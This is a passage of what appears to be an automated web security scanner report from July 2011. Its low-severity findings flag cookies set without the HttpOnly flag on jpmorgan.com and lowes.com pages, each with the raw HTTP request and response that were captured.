Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:28:16 GMT
Server: Apache
Last-Modified: Wed, 14 Nov 2007 17:03:46 GMT
Accept-Ranges: bytes
Content-Length: 6722
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Type: application/x-javascript

/**
* SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
* http://www.opensour
...[SNIP]...

11.310. http://www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/tss/General/ACH_Fraud_Solutions/1159383343594

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tss/General/ACH_Fraud_Solutions/1159383343594 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/General/ACH_Fraud_Solutions/1159383343594%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:41 GMT
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 104738

...[SNIP]...

11.311. http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/tss/General/Payment_Fraud_Prevention/1159339812702

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tss/General/Payment_Fraud_Prevention/1159339812702 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.1.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; ACE_COOKIE=R2666079405

Response

11.312. http://www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpmorgan.com
Path:	/tss/Product_A-Z/Products_and_Solutions/1104848729254

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tss/Product_A-Z/Products_and_Solutions/1104848729254 HTTP/1.1
Host: www.jpmorgan.com
Proxy-Connection: keep-alive
Referer: http://www.jpmorgan.com/tss/General/Payment_Fraud_Prevention/1159339812702
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=NKOJWQS188.20-cws7214CKJKO; JpmcSession=LBhbTcyJNKc41HTgjM8VNfy2sHvPsxGJng5J99hNQNpp0w2V1lfm!1952366882; s_cc=true; __utma=214076236.1737127818.1310484492.1310484492.1310484492.1; __utmb=214076236.5.10.1310484492; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ACE_COOKIE=R2666079405; s_sq=jpmcglobal%2Cjpmorgan%2Cjpmorgantss%2Cjpmorgancash%3D%2526pid%253DGeneral%25253A%252520Security%252520Center%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/tss/Product_A-Z/Products_and_Solutions/1104848729254%2526ot%253DA%26jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DAsset%252520Management%252520-%252520UK%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/am/uk/press_office%2526ot%253DA

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2666079405; path=/; expires=Wed, 13-Jul-2011 15:32:32 GMT
Date: Tue, 12 Jul 2011 15:29:53 GMT
Content-Type: text/html; charset=UTF-8
HOST_SERVICE: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Content-Length: 106611

...[SNIP]...

11.313. http://www.lowes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508047~id=555ff81eba66b18e3e9e19529b94c6db; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Language: en-US
Content-Length: 85257
Expires: Tue, 12 Jul 2011 21:30:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: akaau=1310508047~id=555ff81eba66b18e3e9e19529b94c6db; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!-- BEGIN TopCate
...[SNIP]...

11.314. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_appliances.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/fathers_day/2011/images/homepage/20110531_area3_appliances.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/fathers_day/2011/images/homepage/20110531_area3_appliances.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 30 May 2011 12:04:23 GMT
Accept-Ranges: bytes
Content-Length: 5975
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR.......d.....t+.*....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.315. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_grills.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/fathers_day/2011/images/homepage/20110531_area3_grills.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/fathers_day/2011/images/homepage/20110531_area3_grills.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 30 May 2011 12:04:23 GMT
Accept-Ranges: bytes
Content-Length: 6433
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR.......d.....t+.*....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.316. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_ope.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/fathers_day/2011/images/homepage/20110531_area3_ope.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/fathers_day/2011/images/homepage/20110531_area3_ope.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 30 May 2011 12:04:23 GMT
Accept-Ranges: bytes
Content-Length: 7734
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR.......d.....t+.*....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.317. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110531_area3_patiofurniture.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/fathers_day/2011/images/homepage/20110531_area3_patiofurniture.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/fathers_day/2011/images/homepage/20110531_area3_patiofurniture.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 30 May 2011 12:04:24 GMT
Accept-Ranges: bytes
Content-Length: 6694
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR.......d.....t+.*....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.318. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110608_area5b_laptopimg.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/fathers_day/2011/images/homepage/20110608_area5b_laptopimg.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/fathers_day/2011/images/homepage/20110608_area5b_laptopimg.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Tue, 07 Jun 2011 21:48:37 GMT
Accept-Ranges: bytes
Content-Length: 12987
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:51 GMT
Connection: close
Set-Cookie: akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

.PNG
.
...IHDR.......x............tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.319. http://www.lowes.com/campaign/fathers_day/2011/images/homepage/20110616_area6b_BeatTheHeat.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/fathers_day/2011/images/homepage/20110616_area6b_BeatTheHeat.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/fathers_day/2011/images/homepage/20110616_area6b_BeatTheHeat.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Wed, 15 Jun 2011 14:22:57 GMT
Accept-Ranges: bytes
Content-Length: 38385
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:51 GMT
Connection: close
Set-Cookie: akaau=1310508051~id=2a2d7c73e86ffa9af674df8410f6edd7; path=/

.PNG
.
...IHDR..............a0w....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.320. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area2_PatioNLP.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110621_area2_PatioNLP.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110621_area2_PatioNLP.jpg HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 24 Jun 2011 17:14:04 GMT
Accept-Ranges: bytes
Content-Length: 102276
Content-Type: image/jpeg
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:49 GMT
Connection: close
Set-Cookie: akaau=1310508049~id=38116ec0033a6dd36e726f741c1aecce; path=/

......Exif..II*.................Ducky.......<.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...

11.321. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_cooling.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110621_area3_cooling.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110621_area3_cooling.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 20 Jun 2011 23:09:32 GMT
Accept-Ranges: bytes
Content-Length: 14671
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR.......d.....C.H.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.322. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area3_decking.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110621_area3_decking.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110621_area3_decking.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 20 Jun 2011 23:09:32 GMT
Accept-Ranges: bytes
Content-Length: 5864
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR.......d.....t+.*....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.323. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_area4_vanity.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110621_area4_vanity.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110621_area4_vanity.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 27 Jun 2011 17:03:35 GMT
Accept-Ranges: bytes
Content-Length: 5621
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR...2...7.....N.......tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.324. http://www.lowes.com/campaign/summer/2011/images/homepage/20110621_control_PatioNLP.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110621_control_PatioNLP.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110621_control_PatioNLP.png HTTP/1.1
Host: www.lowes.com
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 20 Jun 2011 12:28:46 GMT
Accept-Ranges: bytes
Content-Length: 3796
Content-Type: image/png
Expires: Tue, 12 Jul 2011 21:30:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:50 GMT
Connection: close
Set-Cookie: akaau=1310508050~id=580a1d4af5cfa38b7a401638fb8c7b47; path=/

.PNG
.
...IHDR...5...6.....P.!.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="A
...[SNIP]...

11.325. http://www.lowes.com/campaign/summer/2011/images/homepage/20110622_area5_background.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/campaign/summer/2011/images/homepage/20110622_area5_background.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

akaau=1310508128~id=678e35c2ef9ce65dc876c6bc8c4b2c09; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/summer/2011/images/homepage/20110622_area5_background.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.lowes.com

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 20 Jun 2011 21:26:58 GMT
Accept-Ranges: bytes
Content-Length: 2522
Content-Type: image/jpeg
Expires: Tue, 12 Jul 2011 21:32:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
